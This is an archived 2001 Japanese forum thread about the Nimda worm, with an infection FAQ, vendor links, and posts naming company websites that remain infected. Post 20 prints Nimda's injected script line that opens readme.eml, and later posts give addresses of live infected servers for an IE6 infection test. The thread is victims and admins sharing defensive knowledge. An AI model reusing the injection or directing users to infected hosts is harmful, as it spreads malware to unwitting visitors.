「Nimda !! 」【その４】

1 ：01/10/01 〜 最終レス ：12/05/20

鬱したな！！親父にも鬱された事無いのに！！

2 ：

●前々々スレ 「Nimda !!」
http://ton.2ch.net/test/read.cgi?bbs=sec&key=1000870301
●前々スレ 「Nimda その弐!!」
http://ton.2ch.net/test/read.cgi?bbs=sec&key=1000973617

●前スレ 「Nimda !! その産」
http://ton.2ch.net/test/read.cgi?bbs=sec&key=1001177275

3 ：

●関連リンク
マイクロソフト「Nimda ワーム に関する情報」
http://www.microsoft.com/japan/technet/security/nimdaalrt.asp
IPAセキュリティセンター
http://www.ipa.go.jp/security/topics/newvirus/nimda.html
シマンテック株式会社
http://www.symantec.com/region/jp/sarcj/data/w/w32.nimda.a@mm.html
トレンドマイクロ株式会社
http://www.trendmicro.co.jp/nimda/
日本ネットワークアソシエイツ株式会社
http://www.nai.com/japan/virusinfo/virN.asp?v=W32/Nimda@MM
トレンドマイクロ・Nimda駆除単体ツール
http://www.trendmicro.co.jp/nimda/tool.asp

現在でまわっているデマ情報
http://keisui.com/GIGAZINE/cgi-bin/news/html/lg/000325.htm
IEバージョン確認法
http://www.geocities.co.jp/Technopolis/2082/Soft/Ie/OE5str.htm
オンラインスキャン
http://www.trendmicro.co.jp/hcall/scan.htm
ウィルス情報
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.nimda.a@mm.html
http://www.nai.com/japan/virusinfo/virN.asp?v=W32/Nimda@MM
http://www.trendmicro.co.jp/virusinfo/troj_nimda.htm

Samba における Nimda ワーム対策
http://www.samba.gr.jp/project/kb/J0/1/09.html

4 ：

●ニムダはWin95/98系など一般のパソコンでは感染しないのですか？
します。
(894)
9X系も感染するとある
http://www.symantec.com/region/jp/sarcj/data/w/w32.nimda.a@mm.html

5 ：

●感染して作られた〜.emlをマイコンピュータやエクスプローラーでクリックしただけで 再び感染することはある？（688）
あります。
●フォルダの設定でWeb表示（.JPGを選択と左側に寒ネイルが表示されるような）で感染サイトの.lnkファイル（お気に入りのこと）を選択す
ると？ （460）
(463)
感染可能ブラウザの場合、選択（開くではない）だけで感染すると思われる。
これ、感染前の.lnkでもリアルタイム更新してると思われる。
(464)
WEB表示にしててネットワーク経由で入れられた *.emlファイルを
確認するため右クリックして選択しただけで感染した例がある。
（IEが未対応だったので）
補足：.htmlなどのファイルでも同様と思われる

6 ：

●検索をしてreadme.eml readme.exeファイルがなくても、エクスプローラでファイル操作するだけで感染することがありますか？（698）
あります。
(569)
C:\WINNT\Temporary Internet Files\Content.IE5\LHMMLNGA のような所に格納されている
main[1].html
みたいなファイル（キャッシュファイル）にふれてしまうと場合によっては感染する。
●readme.emlファイル・reame.exeファイル・nimda感染ファイル(.htmlなど) を手動で検索、削除。安全？(701)
(701)
場合によってはさわっただけで感染する。
その場合ドラッグや右クリックで削除できない（感染する）
【みなさんの人柱精神はたとえささやかなものであってもムダにはいたしません(-人-)】

7 ：

FAQer君がんばってるね。

8 ：

ご苦労さまです。

9 ：

http://3403687705/

10 ：

CodeRed も１０月になっても消えませんね。

11 ：

>>7
すいません、今回のコピペは>>1さんにお願いしちゃいました(^^ゞ
３では新しいFAQ項目も増えていないと思いますので・・。
>>1さん、ありがとうございますm(_ _)m

12 ：

>1
お疲れさまー。
今度から、関連リンクやFAQは>>2-10の辺り・・・とやると
よろしいかもー。

13 ：

>>10
CoderedIIは既に新種になっていたみたい。
http://japan.cnet.com/News/2001/Item/010828-3.html?rn

14 ：

http://www.microsoft.com/japan/windows2000/downloads/servicepacks/sp2/default.asp
で、WIN2K SP2のCD-ROMを頼んだ（24日９
今日届いた。
意外と早かったなぁ。

15 ：

>>13
らしいねえ。CodeRedｽﾚでも、10月になっても止まってないってカキコがあった。
まあ、世界中がまだ10月になったわけじゃないけど・・。

16 ：

aplanem395@zzyffrz.com
からNimda付きメールが来たぞ。
McAfeeが捕まえた、入れてて良かった。

17 ：

>>16
来るのかぁ＜ニムダメール
このｽﾚでの報告は初？

18 ：

マジです。ソース書き込もうか？

19 ：

>>18
できれば。

20 ：

</body>が無いのでこれを書き換えてるのか？
ここから→
From aplanem395@zzyffrz.com Sun, 30 Sep 2001 06:23:47 -0700
Received: from [4.16.194.109] by hotmail.com (3.2) with ESMTP id ; Sun, 30 Sep 2001 06:22:42 -0700
Received:from rly7.fpf.slu.cz (rly7.fpf.slu.cz [172.31.109.14]); Sat, 29 Sep 2001 10:24:38 -0400 (EDT)
Received:from(209.156.84.66); Sat, 29 Sep 2001 10:24:38 -0400 (EDT)
X-Date: Sat, 29 Sep 2001 10:24:38
From: <aplanem395@zzyffrz.com>
Message-Id: <KbSmp24a.KFSm7i5IT4wlzYi.KtWmWi2C.KM5V7ueZO.KTJhqjq@rly7.fpf.slu.cz>
Subject: Get Rid Of Debt - Consolidate!
Mime-Version: 1.0
Content-Type: text/html; charset="us-ascii"
Date: Sat, 29 Sep 2001 21:25:40
<html>
<head>
</head>
<body bgcolor="#ffffff" topmargin=2 leftmargin=5 rightmargin=5 marginwidth=5 marginheight=0 >
<div id="divMsgrObject" style="display:none"></div>
<p>
<s
<CENTER>
<table border=0 width=100% cellpadding=0 cellspacing=0 bgcolor="#000000">
<tr><td valign=top>
<pre>
</pre>
<p align="center"><B>
<FONT SIZE=+3 FACE="Arial,Helvetica" color=#ffffff>CUT YOUR  MONTHLY DEBT
PAYMENTS IN HALF !</FONT></B>
<p align="center"><B>
<FONT SIZE=+3 FACE="Arial,Helvetica" color=#ffffff><i>EVERYONE QUALIFIES!</i></FONT></B></p>
<p align="center"><B>
<FONT SIZE=+3 FACE="Arial,Helvetica" color=#ffffff>FREE PHONE CONSULTATION - NO
OBLIGATION!</p>
<P align="center"><a HREF="http://www.web-advs.net:81/debts/" xonMouseOver="window.status=''; return true;" target="_blank"><font color='HotPink'>CLICK
</font></a></FONT><a HREF="http://www.web-advs.net:81/debts/" xonMouseOver="window.status=''; return true;" target="_blank"><font color="HotPink" size="+3" face="Arial,Helvetica">HERE
FOR DETAILS!</font></a><P align="center"><a href="mailto:removes@web-advs.net"><font face="Arial,Helvetica" size="1" color="#FFFFFF">Click
Here To Be Removed</font></a></B><br>
<br>
</td></tr>
</table>
</form>
<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html>
←ここまで

21 ：

>>20
これは若干違うもののような気がするな。
ワームが送ってきたメールとは思えない…
思うに、このメールの原文がDISK上にHTMLファイルで保存されてて
そこにNimdaが感染して、最下行を書き換えて、
Nimdaは駆除したけど(?)そのままになってたのを、
単純にSPAMで送ってきた、という機序なのではないかと。
メールで誘導してるURLのポートが81番つうのが怪しいんだが(w
どちらにせよ送信元が間抜けなのは間違いなかろう。

22 ：

お騒がせしました。

23 ：

>>22
いや、貴重なサンプルです。ありがとうございました。

24 ：

その画像ならココ
http://www.f2.dion.ne.jp/~impact14/

25 ：

このｽﾚと、にむだにはいろいろ勉強させてもらったよ・・。

26 ：

http://www.bee.woodland.co.jp
駆除はしたみたいだけど、まだIIS/4.0なんだよなー

27 ：

今日の夕刊フジにニムダが載っていますね。
流行後一段落後に新聞に載ったのは初？

28 ：

あ゛っ
まだreadme.emlが残ってる。

29 ：

>>26
いつ再感染するんかワクワク

30 ：

>>28
http://www.bee.woodland.co.jp/readme.eml
だめぢゃん��(￣△￣；
なにやってんだよ。バックアップから上書きでリストアしただけか？
豪快なウイルス駆除法もあったもんだ・・。

31 ：

http://www.zumensoft.co.jp/
ここは閉鎖中。
beeとどっちがさきにまともになるか。

32 ：

>>31
http://cgibbs.mmjp.or.jp/bbs/show/www.zumensoft.co.jp/bbs
Norton Antivirus2000がダメだって。。。。

33 ：

>>32
はっきりいってやりたいのだが、ウイルススキャンソフトを実行して再起動するだけしかやらないなら、どのソフトだってダメだ＜対にむだ

34 ：

IE6で感染する事例が増えた原因がわかった・・。
IEで「.exe」などのファイルにアクセスすると、「ファイルのダウンロード」
という確認ダイアログウィンドウが現れるわけですが、IE 5のときは、
次の場所からファイルをダウンロードするように選択しました。
このファイルの処理方法
○ このプログラムを上記の場所から実行する
◎ このプログラムをディスクに保存する
[ OK ] [キャンセル]
というように、デフォルトはディスクへの保存となっていて、直接開くには、
二回のクリック（「上記の場所から」と「OK」）が必要でした。
それが、なんと、IE 6では、「開く」がデフォルトになってます。
キャプチャ画像（上がIE 6、下がIE 5）
http://java-house.etl.go.jp/~takagi/security/misc/ie6-filedownload-dialog.png
これって危な過ぎるような。ワンクリック手がすべるだけでドカンでしょう。

35 ：

■『Nimda』、再襲来は不発
http://japan.cnet.com/News/2001/Item/011001-3.html?mn
『Nimda』(ニムダ)攻撃の第2波は失敗したようだ。Nimdaワームが28日
に再発するとセキュリティー企業は警告していたが、この懸念は現実の
もとはならなかった。最初の感染から10日後に活動を再開するとされて
いたが、10日後にあたる28日の朝、Nimdaの再襲来を告げる徴候はほと
んど見られなかった。

36 ：

>>32
>ウィルス駆除ソフトはシマンテックNorton Antivirus2000を使っていましたが効き目がありません
効き目がないというのは何を意味してるんだ？
自分がウイルスを助けるような操作をしても注意してくれないということか？

37 ：

age

38 ：

>>32
>な〜に寝ぼけたこと言ってるんですか。
>２ちゃんねるで晒されてまっせ。
>http://ton.2ch.net/test/read.cgi?bbs=sec&key=1001864573
ﾜﾗﾀ&ﾕｳｷｱﾙ

39 ：

>>38
にちゃんねらーにもいいひといるんだなぁ・・。
づめんそふとのヒトは前ｽﾚもみてくれるだろうか。
http://ton.2ch.net/test/read.cgi?bbs=sec&key=1001177275

40 ：

>>34
そそ危険危険デフォルトが開くってなんとかならんかな。
デフォルトの変更方法求む

41 ：

なんじゃこら＞にむだの項
http://www.hh.iij4u.or.jp/~noguti/docs/gaihuu/9gatunikkikou.html

42 ：

をいっ(^^;
http://www.d-link.co.jp/

43 ：

予想通り再開せず
http://www.with9.com/

44 ：

つーか、恥ずかしくないのかね。
看板に落書きされたようなもんだろう。
いつまでも閉鎖したままだったり、汚染されっぱなしで。
会社の看板もこうなのかね、こういう会社は。

45 ：

http://www.unionsys.co.jp/
http://nac-ltd.co.jp/
http://www.htsc.ap.titech.ac.jp
http://www.advaoptical.co.jp/
http://www.sano-mfg.co.jp
http://www1.fl.kansai-u.ac.jp/
http://www.inet-service.co.jp/
http://pc2.autechs-unet.ocn.ne.jp
http://www.with9.com/

46 ：

http://211.135.69.237/hoge
なんなんだよここはっ（＞＜）

47 ：

ns1.ojipack.co.jp
土曜にホームページに載ってたアドレスにメールした。
けど、今日になっても直してな〜い。

48 ：

p4166-flets-adsl01osakakita.osaka.ocn.ne.jp
日本在住韓国人？

49 ：

http://plaza12.mbn.or.jp/~kaiun/
なんだこりゃ

50 ：

>>49
ﾜﾗﾀ

51 ：

http://www.hyundaijapan.co.jp/
また鯖止めてるョ。

52 ：

>>51
弐週間も何やってたんだ(--#

53 ：

>>32
このヒトたちのカキコには最新パターンファイルにアップした形跡がないんだけど・・。

54 ：

SP2収録された雑誌って発売されました？

55 ：

nimda発生の頃から今までずっと鯖停止している会社は、
鯖がnimdaに汚染されて復旧できていない、とみなして良いのだろうか？
結構そういう会社があるのだが。
しかしそういうところは恥ずかしくないのかね。
>44の言う通りだよ。
きちんと管理できないなら最初から看板（サイト）なんて出さなければいいのに。

56 ：

>>54
ttp://www.vwalker.com/news/0105/24_/24_190311.html
>なお，Windows2000SP2はDOS/Vmagazine 6月15日発売号のCD-ROMに収録予定。

57 ：

厨房質問ですが、Nimdaに感染したサイト一覧をリアルタイムで出している処ってあります？
ご存じの方はおせーて┌(_ _)┐

58 ：

>>57
逆にききたい。
ダイアルアップ非固定アドレスの感染者がいたらどうやって
リアルタイムでわかるんだい？

59 ：

>>58
攻撃されれば分かる(w
ダミーのroot.exeとかredeme.exeとか作っておいとけ（ww

60 ：

>>57
リアルタイムとは言えないかもしれないが、専用のニムダ晒しサイトはなくとも、一般のサービスでなぜか教えてくれるところがある。
アタマ使うなり、過去ログ読むなりするんだな。

61 ：

http://cgibbs.mmjp.or.jp/bbs/show/www.zumensoft.co.jp/bbs
ここのヒトは読んでくれたのかね。

62 ：

>>57は最終的に何が知りたいのかわからんが、過去の感染サイトを巡回すると、経験上かなりの確率で再発してるぞ（ｗ

63 ：

>58
> ダイアルアップ非固定アドレスの感染者がいたらどうやって
> リアルタイムでわかるんだい？
もぉ〜ん、アタシ厨房なんです。揚げ足取られるとすぐ転んぢゃうんです。
訂正します。
ある程度まとまって、Nimda感染サイトを一覧できるところを教えてください。
目的は、IE6の動作を試してみたいんです。

64 ：

>>58
ﾊｱ？
>>57の質問はリアルタイムって逝ってるんだから
攻撃されなきゃわかんないだろ。
それとも自分が攻撃されたらリアルタイムサイトも攻撃されてる
のか？（ｗ
Nimda感染サイトは感染すると全世界のIPを攻撃してるのか？
それを踏まえてちょっとからかったんだよ。

65 ：

>>58 → >>59でした。

66 ：

>>65
過去ログ読め。

67 ：

>>64
からかったつもりが自分の厨房ぶり晒してるぞ。

68 ：

>>63 = >>57
繰り返しになるが、ダイアルアップの人が感染者なら
攻撃受ける前にすぐPC落としちゃったらそいつが感染者か
どうかわかんないだろ？
自分で鯖たててみるのが一番手っ取り早いと思う。
この板でしばしば取り上げてる｢また感染してるのかよ｣なサイト
はフレッシュアイで検索してるだけだと思われるが、この方法
だとIIS以外ででっちあげた自作自演サイトも区別しないので
おすすめしない（ｗ

69 ：

>>67
どこが？
リアルタイムで知るっていうことは、今現在の感染サイトの実数
を知りたいと解釈したが？
それを鯖たてればわかるといわれてもね
一部しかわかんないよ（ｗ

70 ：

>>65
過去ログに実数がわかるサイトなんてあったか？
見たおぼえないので示してください。
そんなサイトはありません。

71 ：

また間違えたよ。鬱だし脳
57=64でなくて、58=64だよぉ

72 ：

>>63
なんか>>63の質問の趣旨を理解できない厨房がいるようだが・・。
このｽﾚの感染しているよ、と晒されているサイトはあたってみたのかい？>>63

73 ：

>72
> このｽﾚの感染しているよ、と晒されているサイトはあたってみたのかい？>>63
厨房でスマソ(;´Д｀)
アタシ個人はいくつか逝ってみました。
何がやりたいかと云うと、私を含めて何人かで、OS再インストール予定マシンでIE6を試そーよと、ドキュソ計画を実行中なんです。
アタシはもう十分なんですが、アタシ以下の消防が感染サイトをきぼーん、ただしメールでURLを書いて送るな、バックアップした後もっぺんクリックしたら感染するだろーが、まとまった情報をながしている処をおせーろｺﾞﾙｧと責めるんです。
ここの「Nimda!!」１〜４を示したんですが、消防だからテメーで過去ログ読まないんです。
ぢゃあアタシが過去ログ読んで、それをまとめてアタシのホームページにアップするんかいと、今泣いているんです。
すみません、職人さんが集まっているところで、厨房がスレ汚したようです。
逝きます。

74 ：

>>73
そうするとこのへんかねえ。
http://people.site.ne.jp/mirror2/Nimda/Nimda.txt
https://www.netsecurity.ne.jp/article/8/2923.html
https://www.netsecurity.ne.jp/article/9/2842.html
https://www.netsecurity.ne.jp/article/8/2874.html
https://www.netsecurity.ne.jp/article/8/2877.html
だが先週あたりまではまめに更新していたものの、今週は更新されてないし、
駆除・閉鎖されているところも多い。
（たぶん今も感染状態で開いているところはほとんどないはず。）
感染サイトは生もので、やはりというか当然というか普通は
晒されたら閉鎖・駆除をしてしまう。
73の趣旨からすると、現役感染サイトが知りたいのだろうから、
このｽﾚをチエックして感染してるよ、となったらそれで動作確認、となるんだろう。
ただIE6はいくつかの条件で感染することがわかっているから、
実際に感染しているサイトで感染実験するのはあまり薦められないし、
そのうちひとつの条件で感染した・しないといってもあまり意味はないように
思う。

75 ：

>74
> そうするとこのへんかねえ。
わぁをぅ、有り難うございます。
https://www.netsecurity.ne.jp/
ここからたどると、ある程度最新が判るんですね。
これで消防に逝ってもらいます。
> ただIE6はいくつかの条件で感染することがわかっているから、
> 実際に感染しているサイトで感染実験するのはあまり薦められないし、
> そのうちひとつの条件で感染した・しないといってもあまり意味はないように
> 思う。
アタシがやった時はWindows Media Playerが起ち上がったんですが、ダウンロードで開くがデフォルト選択状態を試したいと消防が駄駄捏ねるんです。ほかの*.exeではダメなんです。
ちなみに消防とは上司です。
さらにアタシの目的は、消防以下ばかりの会社のマシンからIE6を駆逐しておかないと、大変なことになるのを実証したいんです。
面倒かけました。

76 ：

>>75
とりあえず感染サイト。
http://211.96.111.55/

77 ：

>>73
>ただしメールでURLを書いて送るな、
>バックアップした後もっぺんクリックしたら感染するだろーが、
>まとまった情報をながしている処をおせーろｺﾞﾙｧと責めるんです
ここらへんがﾎﾝﾄ頭悪いよね。
別にフルアドレス書かなくてもいいじゃん。
例えば、211.96.111.55　これだけ書いて
http://自分で付けさせりゃ済む話だと思うが。
と言いつつ、おまけ。
http://www.stride.co.jp/~z32/cgi-bin/worm.cgi

78 ：

ありゃま。
http://z.nttec.edu.cn

79 ：

http://www.d-plan.ne.jp/
readme.eml ダウンロードのスクリプトが２行あるのは
２回改竄されたってこと？
＞快適ネットが自慢です！！ 大きな信頼！！ 低コストが魅力です！！
が売り物のネットワークサービス会社だが。。。

80 ：

>>79
index.* には２種類の感染経路があるので
２行書かれてしまうみたいです。

81 ：

eml その他を削除し、セキュ穴やバックドアも埋め、
パッチを当てているとしても、
Webのコンテンツにスクリプト残したままでそれを公開ってのは
結構見た目不細工だと思うのだが、みなさん平気なのかな。。
（このタイプのサイト結構ある）
よごれてない原本使ってかきもどせばよかろうに。

82 ：

>>81
ヨソに作ってもらってるから原本がない（なくしちゃった）だったり（ｗ
いや、けっこうあるんです、こういうとこ（苦笑

83 ：

なるほど、ソースの最後にJavaScriptが空で残ってるサイトは
そういうことなのか（ｗ

84 ：

>>80
じゃあこれなんかは・・？
http://ns.ers.minato.tokyo.jp/

85 ：

>>84
バックドアはあいてるね。
こんなマヌケな法案審議する暇あったらこういうのをなんとかしろ
http://www.mainichi.co.jp/digital/houan/01.html

86 ：

http://www.zumensoft.co.jp/
復活したのか？やればできるじゃん？

87 ：

>>86
と、思ったが
ページが見つかりません
のリンクがいくつもあるな。

88 ：

>>84
１２か？１２もか？
<html><script language="JavaScript"></script></html>
<html><script language="JavaScript"></script></html>
<html><script language="JavaScript"></script></html>
<html><script language="JavaScript"></script></html>
<html><script language="JavaScript"></script></html>
<html><script language="JavaScript"></script></html>
<html><script language="JavaScript"></script></html>
<html><script language="JavaScript"></script></html>
<html><script language="JavaScript"></script></html>
<html><script language="JavaScript"></script></html>
<html><script language="JavaScript"></script></html>
<html><script language="JavaScript"></script></html>

89 ：

>>79
どうやらIISからApacheに変更したようだね。
http://uptime.netcraft.com/up/graph/?mode_u=off&mode_w=on&site=http://www.d-plan.ne.jp/

90 ：

NimdaやCodeRedの影響で、IISから他のWebサーバに
乗り換えたサイトってどのくらいあるんだろう。
IISから他への移行って難しいことが多いみたいだ
けど。

91 ：

>>90
>>86 とか？

92 ：

>>91
違うような気がするが。
http://uptime.netcraft.com/up/graph/?mode_u=off&mode_w=on&site=http://www.zumensoft.co.jp/

93 ：

>>92
あ、Web鯖だけを、ってことね。
ここはWindowsごとおっぽりなげた、と。

94 ：

ちょっと聞いておくれよ。　さっき２ｃｈ見ててNimdaに感染しちゃったよ。
安置うぃるすで除去してくれたけどね。
ＩＥ６なんて役に立たないジャン。

95 ：

IEはみなダメだよマイクロソフト
信じてはだめだよ。
アンチウィルスソフト入れてればわかるが
いれてない人は知らずに使用してると思うよ

96 ：

http://cgibbs.mmjp.or.jp/bbs/show/www.zumensoft.co.jp/bbs
この会社本当にアプリ開発してるんですか？
多分ユーザーにはパソコンに詳しい神様みたいな存在なんでしょうけどねー。
人間を観察するという立場で見れば興味あるサンプルではあるょ。

97 ：

http://www.nt.sakura.ne.jp/~rose/

98 ：

>>96
>２ちゃんえるというＨＰでワクチンを入手できるのですか？
再度ﾜﾗﾀ
かきこした人ちゃんと教えてやれ

99 ：

>>95 そっかやっぱり
当分ＢＳＤ使います。

100read 1read

1read 100read

TOP カテ一覧 スレ一覧 2ch元 削除依頼 ▲

住基ネット祭　その2 (844)
トレンドマイクロ社製品不買運動しないか？ (596)
ウィルスバスターアップデート前にあげるスレ ２ (848)
誰かが私のＰＣに侵入してきます (371)
【最強】ウイルスバスター2008 Part34【伝説】 (403)
【Hackme】ハッキング力検定サイトHackme Lv3 (348)
--log9.info------------------
つりかけ音を海外に求めて (190)
【FS】イタリアの鉄道 (366)
【ALIENS】 Let's talk Japan's railways 【ONLY】 (324)
■□■インドの鉄道□■□ (408)
【Garratt】最萌変型機選考委員会【Goose】 (448)
【歯舞・択捉】北方領土の鉄道【国後・色丹】 (213)
LAOS ラオスの鉄道　 S.A.ASIA (245)
この板の名無しを決めるスレ (143)
初めての海外鉄デビューはどこがいい？ (871)
北海道・四国・九州って海外になるの？ (118)
【高架】シカゴの鉄道について語るスレ【メトラ】 (105)
【ペルー】中南米の鉄道【チリ】 (463)
【和書】雑誌・書籍総合スレ in海外鉄道板【洋書】 (245)
世界の高速鉄道 (944)
【RENFE】スペインの鉄道全般【FEVE】 (448)
【半島】マレーシアの鉄道【ボルネオ】 (824)
--log55.com------------------
東急電鉄車両総合スレッド112
埼玉高速鉄道&東京メトロ南北線「N-26」
(東武)東上線 Part219
東武鉄道車両総合スレッド Part95
酉日本のダイヤはどうして近距離虐待なの？
阪急電鉄車両スレッド68
相鉄・JR直通線、相鉄・東急直通線 41
びゅんびゅん京成@2ch[第195部]